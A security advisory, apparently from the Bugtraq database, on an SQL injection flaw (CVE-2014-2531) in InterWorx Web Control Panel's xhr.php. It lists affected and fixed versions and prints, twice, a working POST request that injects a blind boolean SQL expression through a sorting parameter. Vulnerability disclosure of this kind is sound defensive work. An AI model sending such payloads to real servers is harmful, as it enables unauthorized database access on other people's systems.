InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability
BID:66433
Info
InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability
| Bugtraq ID: | 66433 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-2531 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2014 12:00AM |
| Updated: | Mar 25 2014 12:00AM |
| Credit: | Eric Flokstra |
| Vulnerable: |
InterWorx InterWorx 5.0.13 build 574 |
| Not Vulnerable: |
InterWorx InterWorx 5.0.14 build 577 |
Exploit / POC
InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example data is available:
POST /xhr.php HTTP/1.1
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
Attackers can use a browser to exploit this issue. The following example data is available:
POST /xhr.php HTTP/1.1
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
References
InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability
References:
References:
- InterWorx Homepage (InterWorx)
- InterWorx Version 5.0.14 Released on Beta Channel! (InterWorx)